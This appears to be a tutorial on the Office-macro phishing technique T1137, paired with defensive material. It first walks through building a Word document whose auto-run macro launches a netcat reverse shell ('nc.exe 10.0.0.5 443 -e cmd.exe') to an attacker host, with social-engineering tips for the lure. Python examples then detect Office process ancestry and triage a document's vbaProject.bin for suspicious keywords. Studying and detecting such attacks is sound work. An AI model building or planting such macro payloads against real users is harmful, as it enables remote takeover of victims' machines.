T1137: Phishing - Office Macros
Code execution with VBA Macros
This technique builds a primitive Word document that auto-executes its VBA macro code once the user disables macro protection (clicks "Enable Content").
1. Create a new Word document (CTRL+N).
2. Hit ALT+F11 to open the Macro editor.
3. Double-click "ThisDocument" and paste the following:

```vba
Private Sub Document_Open()
    MsgBox "game over", vbOKOnly, "game over"
    a = Shell("C:\tools\shell.cmd", vbHide)
End Sub
```

C:\tools\shell.cmd, in turn, contains:

```
C:\tools\nc.exe 10.0.0.5 443 -e C:\Windows\System32\cmd.exe
```
This is roughly how it should look in the editor:
Hit ALT+F11 to switch back to document editing mode and add a bit of social engineering, like so:
Save the file as a macro-enabled document, for example Doc3.dotm:
Doc3.dotm - Word document with embedded VBA macros
The victim launching Doc3.dotm:
...and enabling the content, which results in the attacker receiving a reverse shell:
The graphic below shows the process ancestry after the victim clicked the "Enable Content" button in the malicious Doc3.dotm document:
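The ancestry shown above (Word spawning cmd.exe, which spawns nc.exe) is the pattern a defender wants to alert on. The following is an added example, not code from the original page: it indexes process-creation events by pid/ppid, walks each process's ancestry, and reports every descendant of an Office host that is not on a small allowlist. The events are constructed for the example (field names loosely modelled on Sysmon Event ID 1), and the Office and allowlist sets are assumptions to tune locally.

```python
"""Flag processes whose ancestry leads back to an Office application."""
from collections import namedtuple

# Minimal process-creation record; constructed for this example.
Proc = namedtuple("Proc", "pid ppid image cmdline")

# Office hosts whose descendants deserve scrutiny (assumed set, extend as needed).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Children Office spawns routinely; constructed allowlist, tune it for your estate.
BENIGN_CHILDREN = {"splwow64.exe", "msosync.exe"}

# Constructed sample telemetry mirroring the page's Doc3.dotm chain plus benign noise.
SAMPLE_EVENTS = [
    Proc(1000, 1, "explorer.exe", "explorer.exe"),
    Proc(2000, 1000, "WINWORD.EXE", '"WINWORD.EXE" Doc3.dotm'),
    Proc(2100, 2000, "cmd.exe", "cmd /c C:\\tools\\shell.cmd"),
    Proc(2200, 2100, "nc.exe", "nc.exe 10.0.0.5 443 -e cmd.exe"),
    Proc(2300, 2000, "splwow64.exe", "splwow64.exe"),
    Proc(3000, 1000, "chrome.exe", "chrome.exe"),
    Proc(3100, 3000, "cmd.exe", "cmd.exe"),
]


def build_index(events):
    """Map pid -> event so parents can be looked up in O(1)."""
    return {e.pid: e for e in events}


def ancestry(proc, index):
    """Return the chain [root_ancestor, ..., proc] by following ppid links.

    The seen-set guards against pid reuse producing a cycle in the telemetry.
    """
    chain = [proc]
    seen = {proc.pid}
    while proc.ppid in index and proc.ppid not in seen:
        proc = index[proc.ppid]
        seen.add(proc.pid)
        chain.append(proc)
    return list(reversed(chain))


def office_descendant_alerts(events):
    """Return 'WINWORD.EXE > cmd.exe > ...' strings for each suspicious descendant.

    Every process with an Office ancestor is reported unless it is itself an
    Office host or on the benign allowlist; the chain starts at the Office host.
    """
    index = build_index(events)
    alerts = []
    for e in events:
        image = e.image.lower()
        if image in OFFICE_IMAGES or image in BENIGN_CHILDREN:
            continue
        chain = ancestry(e, index)
        office_positions = [i for i, p in enumerate(chain)
                            if p.image.lower() in OFFICE_IMAGES]
        if office_positions:
            alerts.append(" > ".join(p.image for p in chain[office_positions[0]:]))
    return alerts


if __name__ == "__main__":
    for alert in office_descendant_alerts(SAMPLE_EVENTS):
        print("suspicious Office child chain:", alert)
```

Run against the constructed events, the rule reports `WINWORD.EXE > cmd.exe` and `WINWORD.EXE > cmd.exe > nc.exe`, while `splwow64.exe` (allowlisted) and the `chrome.exe > cmd.exe` pair (no Office ancestor) stay silent. Reporting the whole chain rather than only the immediate parent is what makes the nc.exe grandchild visible even though Word never launched it directly.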
If you receive a suspicious Office document and have no malware analysis tools, hopefully you at least have WinZip or 7-Zip, a strings utility, or any kind of hex editor to hand.
Since Office files are essentially ZIP archives (PK magic bytes):
...the file Doc3.dotm can be renamed to Doc3.zip and extracted like a regular ZIP archive. Doing so reveals the files that make up the malicious Office document, among them document.xml, which holds the main document body text, and vbaProject.bin, which contains the macros themselves:
Additionally, if you have strings or a hex-dumping utility, you can pass vbaProject.bin through it. This can sometimes give a defender enough to decide whether the document is suspicious or malicious.
`hexdump -C vbaProject.bin` reveals fragmented keywords that should immediately raise suspicion (Shell, Hide, Sub_Open) and something that looks like a file path:
If you have the malware analysis Linux distro REMnux, you can inspect the VBA macro code contained in the document with the command `olevba.py filename.dotm`. As seen below, the command decodes vbaProject.bin, reveals the actual code and provides some interpretation of the commands found in the script:
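The manual triage described above (check the PK magic, unzip, locate vbaProject.bin, look for keywords and file paths in the raw bytes) can be scripted. The following is an added example, not code from the original page or from the olevba project: it performs that raw-byte check on any Office Open XML file, and `build_sample_docm()` constructs a stand-in for Doc3.dotm with a hand-made vbaProject.bin so the script runs offline. The keyword list and the fake macro blob are constructed for the example. Note that a real vbaProject.bin stores the source MS-OVBA compressed, which is why the hexdump shows only fragmented keywords; for a clean decompression use olevba as described above.

```python
"""Offline triage of an Office Open XML document for embedded VBA macros."""
import io
import re
import sys
import zipfile

# Indicators the hexdump step above surfaces from a raw vbaProject.bin.
# Constructed starter list for this example; extend with your own.
SUSPICIOUS_KEYWORDS = (b"Shell", b"Hide", b"Document_Open", b"AutoOpen",
                       b"Auto_Open", b"CreateObject")

# Windows drive-letter paths (e.g. C:\tools\shell.cmd) a macro might launch.
PATH_RE = re.compile(rb"[A-Za-z]:\\[\w.\\-]+")


def is_ooxml(data: bytes) -> bool:
    """True if the bytes start with the ZIP 'PK' magic and parse as a ZIP archive."""
    return data[:2] == b"PK" and zipfile.is_zipfile(io.BytesIO(data))


def find_macro_parts(zf: zipfile.ZipFile) -> list:
    """Archive members holding VBA projects (vbaProject.bin in any folder)."""
    return sorted(n for n in zf.namelist() if n.lower().endswith("vbaproject.bin"))


def scan_macro_blob(blob: bytes) -> dict:
    """Keyword and path hits in the raw, still-compressed VBA storage.

    Literal runs survive MS-OVBA compression often enough to be useful, but
    a proper decompression (olevba) is the reliable way to read the source.
    """
    keywords = sorted(k.decode() for k in SUSPICIOUS_KEYWORDS if k in blob)
    paths = sorted({m.decode(errors="replace") for m in PATH_RE.findall(blob)})
    return {"keywords": keywords, "paths": paths}


def triage(data: bytes) -> dict:
    """Summarise whether a document carries macros and what the raw bytes reveal."""
    result = {"is_ooxml": False, "macro_parts": [], "keywords": [], "paths": []}
    if not is_ooxml(data):
        return result
    result["is_ooxml"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        result["macro_parts"] = find_macro_parts(zf)
        for name in result["macro_parts"]:
            hits = scan_macro_blob(zf.read(name))
            result["keywords"] = sorted(set(result["keywords"]) | set(hits["keywords"]))
            result["paths"] = sorted(set(result["paths"]) | set(hits["paths"]))
    return result


def build_sample_docm() -> bytes:
    """Constructed stand-in for Doc3.dotm: a minimal OOXML ZIP with a fake vbaProject.bin.

    The blob is hand-made for this example to mimic the fragmented keywords the
    hexdump in the text shows; it is not a real compiled VBA project.
    """
    fake_vba = (b"\x00\x00Attribute VB_Name = \"ThisDocument\"\x00"
                b"Sub Document_Open()\x00MsgBox\x00Shell\x00vbHide\x00"
                b"C:\\tools\\shell.cmd\x00End Sub\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", fake_vba)
    return buf.getvalue()


if __name__ == "__main__":
    # Pass a .docm/.dotm path to triage it; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docm()
    print(triage(data))
```

Against the constructed sample the script reports `word/vbaProject.bin` as the macro part, the keywords `Document_Open`, `Hide` and `Shell`, and the path `C:\tools\shell.cmd`; a non-ZIP input yields an empty result rather than an exception. The presence of a vbaProject.bin part alone is the first signal worth acting on, since a legitimate .docx has no such member.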